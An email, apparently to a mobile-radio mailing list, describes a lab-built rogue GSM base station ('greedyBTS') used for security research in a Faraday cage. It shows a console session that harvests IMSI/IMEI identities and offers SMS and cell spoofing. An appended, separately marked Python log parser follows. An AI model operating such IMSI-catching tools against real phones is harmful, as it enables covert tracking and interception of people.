<div dir="ltr"><div class="">Hi all,</div><div style="font-family:arial,sans-serif;font-size:12.8px">
My first attempt to send this email didn't appear to succeed, so I am re-sending without the attachment. Here is a copy of some slides <a href="https://github.com/HackerFantastic/Public/blob/master/presentations/mwri_labs-GSM-Hacking-Wireless-Mobile-Phone-Communication_2014-01-30.pdf">https://github.com/HackerFantastic/Public/blob/master/presentations/mwri_labs-GSM-Hacking-Wireless-Mobile-Phone-Communication_2014-01-30.pdf</a> that I wrote for a presentation on
security weaknesses within GSM. I used an Ettus E100 to develop a
malicious BTS and GSM-related attacks in a Faraday cage and presented on
how these attacks work, to better understand them for defensive
purposes. I was able to use the E100 as a generic IP router after I
cross-compiled a new kernel with netfilter enabled; I also had to
recompile a number of packages, such as Asterisk, to enable ODBC and
improved SQLite support, and make some changes to Python and
its modules. I used GNU Radio 3.6.4 and had to compile a specific
version of the OpenBTS code, as the recent transceiver application did
not function with the E100. I was able to get the E100 to work as a
GSM/GPRS router and do real-time call placement etc. I got it to
function with real-time support and wrote a small script to provision
new devices by watching the syslog and adding them to the SQLite database.</div>
<div style="font-family:arial,sans-serif;font-size:12.8px"><br></div><div style="font-family:arial,sans-serif;font-size:12.8px">I
also used osmocom-bb to do things like use gnuplot and graph the
channel usage, although the code is extremely ugly! I took RSSI
measurements over a period of time into images and then tied them
together for a movie; it isn't quite real time, but it makes pretty
graphs. I mentioned how you could implement the MS side of the GSM stack
using the osmocom project and as such am sharing the slides with the osmocom list. </div>
<div style="font-family:arial,sans-serif;font-size:12.8px"><br></div><div style="font-family:arial,sans-serif;font-size:12.8px">Just
goes to show how mighty things come in small packages! Hope this
material is useful to others on the list who may also be trying similar
experiments. I ended up creating a firmware image that could be used to
dd and boot an E100, but at this time I do not plan on hosting it for
download unless there is sufficient interest. If you need it for some
reason, drop me an e-mail. </div>
<div style="font-family:arial,sans-serif;font-size:12.8px"><br></div><div style="font-family:arial,sans-serif;font-size:12.8px">Here is an example of the output of the greedyBTS script. As an example, my code plays "Rick Astley - never going to give you up" when a user places a phone call and they have been provisioned with service. All of this work was done in a Faraday cage, which I obtained from Ramsey Electronics, which had a very good frequency attenuation graph from 0 MHz all the way to 1 GHz.<br>
<br><div>root@usrp-e1xx:~# ./launch.sh </div><div>Launching asterisk</div><div>Launching HLR SMS</div><div>Launching OpenBTS</div><div>Launching Greedy BTS..</div><div><br></div><div> 888 888 d8 </div>
<div> e88 888 888,8, ,e e, ,e e, e88 888 Y8b Y888P 888 88e d88 dP"Y </div><div>d888 888 888 " d88 88b d88 88b d888 888 Y8b Y8P 888 888b d88888 C88b </div><div>Y888 888 888 888 , 888 , Y888 888 Y8b Y 888 888P 888 Y88D </div>
<div> "88 888 888 "YeeP" "YeeP" "88 888 888 888 88" 888 d,dP </div><div> , 88P 888 pDK++ </div><div> "8",P" 888 </div>
<div><br></div><div> </div><div>[+] Current CELL configuration</div><div>[-] ==========================</div><div>[-] Shortname: 'Noone'</div><div>[-] MCC: 901 MNC: 70 C0 ARFCN: 51</div><div>[-] LAC: 3336 ARFCN's: 1 BAND: 900</div>
<div>[-] </div><div>[-] Radio Power</div><div>[-] ===========</div><div>[-] RxGain: 47 MaxPower: 10 MinPower: 0 </div><div>--> help </div>
<div>[+] HELP SCREEN </div><div>[-] dump imei - lists all identified IMEI </div><div>[-] dump assoc - lists all IMEI+IMSI associations </div>
<div>[-] dump imsi - lists all identified IMSI </div><div>[-] dump save - store a record of all identities </div><div>[-] start service - provide service to IMSI & log traffic </div>
<div>[-] show service - show all provisioned phones </div><div>[-] stop service - deletes an identified IMSI from HLR </div><div>[-] calls - provide call collection statistics </div>
<div>[-] sms - provide sms collection statistics </div><div>[!] gprs - provide gprs collection statistics </div><div>[-] cellconfig - configure cell parameters for spoofing </div>
<div>[-] cellinfo - dump information on current cell </div><div>[-] cellshow - list short codes for common cells </div><div>[!] sounddial - play a sound recording to an IMSI </div>
<div>[!] spoofsms - send a spoof SMS message to an IMSI </div><div>[!] trunksetup - display current SIP trunk details </div><div>[-] verbose - turn on real time tracing </div>
<div>[-] exit - leave without shutdown </div><div>[-] shutdown - bye! </div><div>--> dump imei </div>
<div>[+] Dumping seen handset IMEI </div><div>[-] 1: IMEI359209002648230 </div><div>[-] 2: IMEI358622002760070 </div>
<div>[-] 3: IMEI350694801239040 </div><div>[-] Total IMEI identified 3 </div><div>--> dump imsi </div>
<div>[+] Dumping IMSI capture results </div><div>[-] 1: IMSI901700000002484 </div><div>[-] 2: IMSI901700000002486 </div>
<div>[-] 3: IMSI901700000002488 </div><div>[-] Total IMSI identified 3 </div><div>--> dump assoc </div>
<div>[+] Dumping IMSI/IMEI association </div><div>[-] 1 IMEI:358622002760070 used IMSI901700000002486 </div><div>[-] 2 IMEI:350694801239040 used IMSI901700000002488 </div>
<div>[-] Total associations 2 </div><div>--> show service </div><div>[+] Displaying all provisioned IMSI </div>
<div>[-] 1: exten: 2100 user: IMSI001010000000000 </div><div>[-] 2: exten: 2339 user: IMSI901700000002484 </div><div>[-] Total subscriber count 2 </div>
<div>--> stop service </div><div>[+] Deleting IMSI from HLR </div><div>[-] Enter IMSI: IMSI901700000002484 </div>
<div>[-] Deleted IMSI901700000002484 </div><div>--> help </div><div>[+] HELP SCREEN </div>
<div>[-] dump imei - lists all identified IMEI </div><div>[-] dump assoc - lists all IMEI+IMSI associations </div><div>[-] dump imsi - lists all identified IMSI </div>
<div>[-] dump save - store a record of all identities </div><div>[-] start service - provide service to IMSI & log traffic </div><div>[-] show service - show all provisioned phones </div>
<div>[-] stop service - deletes an identified IMSI from HLR </div><div>[-] calls - provide call collection statistics </div><div>[-] sms - provide sms collection statistics </div>
<div>[!] gprs - provide gprs collection statistics </div><div>[-] cellconfig - configure cell parameters for spoofing </div><div>[-] cellinfo - dump information on current cell </div>
<div>[-] cellshow - list short codes for common cells </div><div>[!] sounddial - play a sound recording to an IMSI </div><div>[!] spoofsms - send a spoof SMS message to an IMSI </div>
<div>[!] trunksetup - display current SIP trunk details </div><div>[-] verbose - turn on real time tracing </div><div>[-] exit - leave without shutdown </div>
<div>[-] shutdown - bye! </div><div>--> dump imei </div><div>[+] Dumping seen handset IMEI </div>
<div>[-] 1: IMEI359209002648230 </div><div>[-] 2: IMEI358622002760070 </div><div>[-] 3: IMEI350694801239040 </div>
<div>[-] Total IMEI identified 3 </div><div>--> dump imsi </div><div>[+] Dumping IMSI capture results </div>
<div>[-] 1: IMSI901700000002484 </div><div>[-] 2: IMSI901700000002486 </div><div>[-] 3: IMSI901700000002488 </div>
<div>[-] Total IMSI identified 3 </div><div>--> dump assoc </div><div>[+] Dumping IMSI/IMEI association </div>
<div>[-] 1 IMEI:358622002760070 used IMSI901700000002486 </div><div>[-] 2 IMEI:350694801239040 used IMSI901700000002488 </div><div>[-] Total associations 2 </div>
<div>--> dump save </div><div>[+] Saving IMSI capture results </div><div>[+] Saving seen handset IMEI </div>
<div>[+] Saving IMSI/IMEI association </div><div>[-] logfile stored as 'greedybts.log' </div><div>--> shutdown </div>
<div>root@usrp-e1xx:~# cat greedybts.log </div><div>[-] 1: IMSI901700000002484 </div><div>[-] 2: IMSI901700000002486 </div>
<div>[-] 3: IMSI901700000002488 </div><div>[-] Total IMSI identified 3 </div><div>[-] 1: IMEI359209002648230 </div>
<div>[-] 2: IMEI358622002760070 </div><div>[-] 3: IMEI350694801239040 </div><div>[-] Total IMEI identified 3 </div>
<div>[-] 1 IMEI:358622002760070 used IMSI901700000002486 </div><div>[-] 2 IMEI:350694801239040 used IMSI901700000002488 </div>[-] Total associations 2<br></div><div style="font-family:arial,sans-serif;font-size:12.8px">
<br><br></div><div style="font-family:arial,sans-serif;font-size:12.8px">Kind Regards,</div><div style="font-family:arial,sans-serif;font-size:12.8px">
Matthew</div><br><br><br><br>
</div>
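The greedybts.log listing in the email has a simple line format. The following Python, added here as an example and not part of Matthew's greedyBTS code, parses such a log, cross-checks the tool's own "Total" counters against what was actually listed, and reports identities that were captured but never paired. The sample log is a copy of the listing from the email; the 2-digit MNC used by `foreign_plmn` is an assumption that follows the MCC 901 / MNC 70 cell configuration shown.

```python
import re

# Constructed sample: a copy of the greedybts.log listing shown in the email above.
SAMPLE_LOG = """\
[-] 1: IMSI901700000002484
[-] 2: IMSI901700000002486
[-] 3: IMSI901700000002488
[-] Total IMSI identified 3
[-] 1: IMEI359209002648230
[-] 2: IMEI358622002760070
[-] 3: IMEI350694801239040
[-] Total IMEI identified 3
[-] 1 IMEI:358622002760070 used IMSI901700000002486
[-] 2 IMEI:350694801239040 used IMSI901700000002488
[-] Total associations 2
"""

IDENT_RE = re.compile(r"^\[-\] \d+: (IMSI|IMEI)(\d+)$")
ASSOC_RE = re.compile(r"^\[-\] \d+ IMEI:(\d+) used IMSI(\d+)$")
TOTAL_RE = re.compile(r"^\[-\] Total (IMSI identified|IMEI identified|associations) (\d+)$")

def parse_greedybts_log(text):
    inv = {"imsis": [], "imeis": [], "assoc": {}, "totals": {}, "problems": []}  # assoc: IMEI -> IMSI
    for lineno, line in enumerate(map(str.rstrip, text.splitlines()), 1):
        if not line: continue
        if m := IDENT_RE.match(line):
            inv["imsis" if m.group(1) == "IMSI" else "imeis"].append(m.group(2))
        elif m := ASSOC_RE.match(line):
            inv["assoc"][m.group(1)] = m.group(2)
        elif m := TOTAL_RE.match(line):
            inv["totals"][m.group(1)] = int(m.group(2))
        else:
            inv["problems"].append(f"line {lineno}: unrecognised: {line}")
    # Cross-check the tool's own counters against what was actually parsed.
    expected = {"IMSI identified": len(inv["imsis"]), "IMEI identified": len(inv["imeis"]),
                "associations": len(inv["assoc"])}
    for key, seen in expected.items():
        if inv["totals"].get(key) != seen:
            inv["problems"].append(f"{key}: log says {inv['totals'].get(key)}, parsed {seen}")
    return inv

def unassociated(inv):
    # Identities captured but never paired: (IMEIs without an IMSI, IMSIs without an IMEI).
    imeis = sorted(set(inv["imeis"]) - set(inv["assoc"]))
    imsis = sorted(set(inv["imsis"]) - set(inv["assoc"].values()))
    return imeis, imsis

def foreign_plmn(inv, mcc="901", mnc="70"):
    # IMSIs not belonging to the cell's PLMN; 2-digit MNC assumed (MCC 901 / MNC 70 cell in the email).
    return [i for i in inv["imsis"] if not i.startswith(mcc + mnc)]
```

On the sample log the parser reports no problems, one IMEI and one IMSI without a pairing, and no IMSI outside the lab PLMN; editing a "Total" line in the input makes the cross-check fail.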